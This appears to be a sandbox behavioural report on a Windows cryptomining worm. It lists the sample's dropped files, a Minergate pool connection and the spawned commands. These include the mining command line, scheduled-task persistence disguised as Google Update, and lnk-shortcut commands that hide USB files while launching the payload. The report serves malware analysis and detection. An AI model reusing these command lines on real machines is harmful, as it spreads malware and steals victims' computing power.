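Technical Information
Behavioural indicators recorded for the analysed sample, in order: file-system paths on the host and on removable media (several are repeated, so the sub-headings that distinguished the groups appear to have been lost in extraction), the network endpoint and DNS query, a window class/name entry, and the command lines of the processes that were started.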
- <SYSTEM32>\tasks\googleupdate_ru
- <Drive name for removable media>:\recycle.bin\xmr.exe
- <Drive name for removable media>:\recycle.bin\fromusb.exe
- <Drive name for removable media>:\archer.avi.lnk
- <Drive name for removable media>:\correct.avi.lnk
- <Drive name for removable media>:\000814251_video_01.avi.lnk
- <Drive name for removable media>:\delete.avi.lnk
- <Drive name for removable media>:\join.avi.lnk
- <Drive name for removable media>:\dashborder_96.bmp.lnk
- <Drive name for removable media>:\default.bmp.lnk
- <Drive name for removable media>:\dashborder_144.bmp.lnk
- <Drive name for removable media>:\tileimage.bmp.lnk
- <Drive name for removable media>:\toolbar.bmp.lnk
- <Drive name for removable media>:\sdkfailsafeemulator.cer.lnk
- <Drive name for removable media>:\contoso.cer.lnk
- <Drive name for removable media>:\contosoroot_1.cer.lnk
- <Drive name for removable media>:\contoso_1.cer.lnk
- %TEMP%\rarsfx0\noods.exe
- %LOCALAPPDATA%\googleupdater\fromusb.exe
- %LOCALAPPDATA%\googleupdater\nscpucnminer32.exe
- %LOCALAPPDATA%\googleupdater\cpu32.exe
- %LOCALAPPDATA%\googleupdater\cpu64.exe
- %LOCALAPPDATA%\googleupdater\nscpucnminer64.exe
- %LOCALAPPDATA%\googleupdater\schost.exe
- %LOCALAPPDATA%\googleupdater\info.xml
- %LOCALAPPDATA%\googleupdater\tousb.exe
- %TEMP%\8c95.tmp\scstarter.bat
- %TEMP%\8c95.tmp\cpu.exe
- %TEMP%\92fb.tmp\cmsm.bat
- %TEMP%\96c2.tmp\cpu64.bat
- %LOCALAPPDATA%\googleupdater\1737137917_log.txt
- %LOCALAPPDATA%\googleupdater\xxmklink.exe
- %TEMP%\63ff.tmp\checkdate.bat
- %LOCALAPPDATA%\googleupdater\cmsm.exe
- %LOCALAPPDATA%\mozilla\checkdate.exe
- %TEMP%\48f1.tmp\checkdate.exe
- %TEMP%\40e6.tmp\40e7.bat
- %TEMP%\40e6.tmp\xmr.exe
- %LOCALAPPDATA%\mozilla\xmr.exe
- %TEMP%\48f1.tmp\reserver.bat
- %TEMP%\48f1.tmp\cmsm.exe
- %TEMP%\48f1.tmp\cpu32.exe
- %TEMP%\rarsfx1\nood.exe
- %TEMP%\48f1.tmp\cpu64.exe
- %TEMP%\48f1.tmp\info.xml
- %TEMP%\48f1.tmp\nscpucnminer32.exe
- %TEMP%\48f1.tmp\nscpucnminer64.exe
- %TEMP%\48f1.tmp\schost.exe
- %TEMP%\48f1.tmp\tousb.exe
- %TEMP%\48f1.tmp\xxmklink.exe
- %TEMP%\48f1.tmp\fromusb.exe
- %TEMP%\ceb.tmp\checkdate.bat
- %TEMP%\16ca.tmp\tousb.bat
- %LOCALAPPDATA%\mozilla\xmr.exe
- %LOCALAPPDATA%\mozilla\checkdate.exe
- <Drive name for removable media>:\recycle.bin\xmr.exe
- <Drive name for removable media>:\recycle.bin\fromusb.exe
- %TEMP%\40e6.tmp\xmr.exe
- %TEMP%\48f1.tmp\reserver.bat
- %TEMP%\48f1.tmp\checkdate.exe
- %TEMP%\48f1.tmp\xxmklink.exe
- %TEMP%\48f1.tmp\tousb.exe
- %TEMP%\48f1.tmp\schost.exe
- %TEMP%\48f1.tmp\nscpucnminer64.exe
- %TEMP%\48f1.tmp\nscpucnminer32.exe
- %TEMP%\48f1.tmp\info.xml
- %TEMP%\48f1.tmp\fromusb.exe
- %TEMP%\96c2.tmp\cpu64.bat
- %TEMP%\48f1.tmp\cpu64.exe
- %TEMP%\48f1.tmp\cmsm.exe
- %LOCALAPPDATA%\googleupdater\info.xml
- %TEMP%\92fb.tmp\cmsm.bat
- %TEMP%\8c95.tmp\scstarter.bat
- %TEMP%\8c95.tmp\cpu.exe
- %TEMP%\63ff.tmp\checkdate.bat
- %TEMP%\rarsfx0\noods.exe
- %TEMP%\rarsfx1\nood.exe
- %TEMP%\40e6.tmp\40e7.bat
- %TEMP%\48f1.tmp\cpu32.exe
- %TEMP%\ceb.tmp\checkdate.bat
- 'xm#.###l.minergate.com':45560
- DNS ASK xm#.###l.minergate.com
- ClassName: 'EDIT' WindowName: ''
- '%TEMP%\rarsfx0\noods.exe' -pgreatest
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\TestCertificate.cer.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\TestCertificate.cer & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\pmd.cer.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\pmd.cer & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\uep_form_786_bulletin_1726i602.doc.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\uep_form_786_bulletin_1726i602.doc & start /B /D .\ .\Recycle.Bin\fromUSB.ex...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\weeklysheet1215.doc.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\weeklysheet1215.doc & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\508softwareandos.doc.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\508softwareandos.doc & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\cveuropeo.doc.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\cveuropeo.doc & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\sdszfo.docx.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\sdszfo.docx & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\thlps_keeper_mayer_1965.docx.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\thlps_keeper_mayer_1965.docx & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\nwfieldnotes1966.docx.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\nwfieldnotes1966.docx & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\she...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\aoc_saq_d_v3_merchant.docx.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\aoc_saq_d_v3_merchant.docx & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYS...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\glidescope_review_rev_010.docx.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\glidescope_review_rev_010.docx & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" ""...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\calc.exe.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\calc.exe & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\tcm851ax32.exe.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\tcm851ax32.exe & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\skypesetup.exe.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\skypesetup.exe & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\notepad.exe.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\notepad.exe & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\dotnetfx45_full_setup.exe.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\dotnetfx45_full_setup.exe & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTE...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\iTunesHelpUnavailable.htm.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\iTunesHelpUnavailable.htm & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTE...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\about.htm.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\about.htm & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\advice_process.htm.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\advice_process.htm & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.d...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\contoso_1.cer.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\contoso_1.cer & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\alert.htm.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\alert.htm & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\contosoroot_1.cer.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\contosoroot_1.cer & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\SDKFailsafeEmulator.cer.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\SDKFailsafeEmulator.cer & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>...
- '%TEMP%\rarsfx1\nood.exe'
- '%LOCALAPPDATA%\mozilla\xmr.exe'
- '%LOCALAPPDATA%\mozilla\checkdate.exe'
- '%LOCALAPPDATA%\googleupdater\schost.exe'
- '%TEMP%\8c95.tmp\cpu.exe'
- '%LOCALAPPDATA%\googleupdater\cmsm.exe'
- '%LOCALAPPDATA%\googleupdater\cpu64.exe'
- '%LOCALAPPDATA%\googleupdater\nscpucnminer64.exe' -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u noodon@yandex.ru -p x -t 1
- '%LOCALAPPDATA%\googleupdater\tousb.exe'
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\archer.avi.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\archer.avi & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\correct.avi.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\correct.avi & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\000814251_video_01.avi.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\000814251_video_01.avi & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\s...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\delete.avi.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\delete.avi & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\join.avi.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\join.avi & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\dashBorder_96.bmp.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\dashBorder_96.bmp & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\default.bmp.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\default.bmp & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\dashBorder_144.bmp.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\dashBorder_144.bmp & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.d...
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\tileimage.bmp.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\tileimage.bmp & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\toolbar.bmp.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\toolbar.bmp & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\contoso.cer.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\contoso.cer & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '%LOCALAPPDATA%\googleupdater\xxmklink.exe' "<Drive name for removable media>:\iisstart.htm.lnk" "<SYSTEM32>\cmd.exe" "/C start /B /D .\ .\iisstart.htm & start /B /D .\ .\Recycle.Bin\fromUSB.exe" "" "" 7 "<SYSTEM32>\shell32.dll" /q
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\40E6.tmp\40E7.bat %TEMP%\RarSFX1\NooD.exe"
- '%WINDIR%\syswow64\xcopy.exe' /y "%LOCALAPPDATA%\GoogleUpdater\fromUSB.exe" "<Drive name for removable media>:\Recycle.Bin\"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\contosoroot_1.cer"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\contoso.cer"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\SDKFailsafeEmulator.cer"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\toolbar.bmp"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\tileimage.bmp"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\dashBorder_144.bmp"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\default.bmp"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\dashBorder_96.bmp"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\join.avi"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\delete.avi"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\000814251_video_01.avi"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\correct.avi"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\cveuropeo.doc"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\Recycle.Bin\fromUSB.exe"
- '%WINDIR%\syswow64\attrib.exe' +h +s "%LOCALAPPDATA%\Mozilla\xmr.exe"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\sdszfo.docx"
- '%WINDIR%\syswow64\cmd.exe' /c dir /b /a "<Drive name for removable media>:\"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\thlps_keeper_mayer_1965.docx"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\notepad.exe"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\TestCertificate.cer"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\uep_form_786_bulletin_1726i602.doc"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\alert.htm"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\advice_process.htm"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\about.htm"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\iTunesHelpUnavailable.htm"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\dotnetfx45_full_setup.exe"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\glidescope_review_rev_010.docx"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\skypesetup.exe"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\tcm851ax32.exe"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\calc.exe"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\contoso_1.cer"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\aoc_saq_d_v3_merchant.docx"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\nwfieldnotes1966.docx"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\Recycle.Bin\xmr.exe"
- '%WINDIR%\syswow64\xcopy.exe' /y "%LOCALAPPDATA%\Mozilla\xmr.exe" "<Drive name for removable media>:\Recycle.Bin\"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\archer.avi"
- '<SYSTEM32>\attrib.exe' +h +s "%LOCALAPPDATA%\Mozilla\xmr.exe"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\pmd.cer"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\508softwareandos.doc"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\Recycle.Bin"
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\63FF.tmp\checkdate.bat" "
- '%WINDIR%\syswow64\attrib.exe' +h +s "%LOCALAPPDATA%\Mozilla\checkdate.exe"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\XXMKLINK.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\toUSB.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\NsCpuCNMiner64.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\CPU64.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\CPU32.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\attrib.exe' -h -s "%LOCALAPPDATA%\Mozilla\xmr.exe"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\NsCpuCNMiner32.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\info.xml" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\schost.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\cmsm.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\checkdate.exe" "%LOCALAPPDATA%\Mozilla\"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\weeklysheet1215.doc"
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\iisstart.htm"
- '<SYSTEM32>\xcopy.exe' /y "%TEMP%\40E6.tmp\xmr.exe" "%LOCALAPPDATA%\Mozilla\"
- '%WINDIR%\syswow64\xcopy.exe' /Y "%TEMP%\48F1.tmp\fromUSB.exe" "%LOCALAPPDATA%\GoogleUpdater\"
- '%WINDIR%\syswow64\tasklist.exe'
- '%WINDIR%\syswow64\attrib.exe' +h +s "<Drive name for removable media>:\64bit_notes.htm"
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\48F1.tmp\reserver.bat" "
- '%WINDIR%\syswow64\schtasks.exe' /create /tn "GoogleUpdate_RU" /xml "%LOCALAPPDATA%\GoogleUpdater\info.xml"
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\8C95.tmp\scstarter.bat" "
- '%WINDIR%\syswow64\cmd.exe' /c %USERPROFILE%\AppData\Local\GoogleUpdater\cmsm.exe
- '%WINDIR%\syswow64\find.exe' /i "NsCpuCNMiner64.exe"
- '%WINDIR%\syswow64\wbem\wmic.exe' logicaldisk where (drivetype="2") get name,volumeserialnumber /format:csv
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\96C2.tmp\CPU64.bat" "
- '%WINDIR%\syswow64\cmd.exe' /c "wmic logicaldisk where (drivetype="2") get name,volumeserialnumber /format:csv" 2>nul
- '<SYSTEM32>\taskeng.exe' {E4D997D4-3C86-4105-8498-308D00CEBCDD} S-1-5-21-3691498038-2086406363-2140527554-1000:ypckhigq\user:Interactive:[1]
- '%WINDIR%\syswow64\find.exe' /i "NsCpuCNMiner32.exe"
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\CEB.tmp\checkdate.bat" "
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\16CA.tmp\toUSB.bat" "
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\92FB.tmp\cmsm.bat" "
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\48F1.tmp\reserver.bat" " (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\16CA.tmp\toUSB.bat" " (with hidden window)
- '%LOCALAPPDATA%\mozilla\checkdate.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\8C95.tmp\scstarter.bat" " (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\96C2.tmp\CPU64.bat" " (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\92FB.tmp\cmsm.bat" " (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\CEB.tmp\checkdate.bat" " (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\40E6.tmp\40E7.bat %TEMP%\RarSFX1\NooD.exe" (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\63FF.tmp\checkdate.bat" " (with hidden window)